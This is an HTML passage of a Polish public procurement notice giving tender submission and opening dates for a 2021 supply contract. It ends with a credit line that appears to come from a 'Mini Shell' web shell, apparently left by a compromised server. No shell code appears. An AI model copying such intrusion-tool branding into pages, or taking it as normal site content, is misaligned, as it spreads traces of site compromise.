środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-04 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-04 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-03</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-23 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com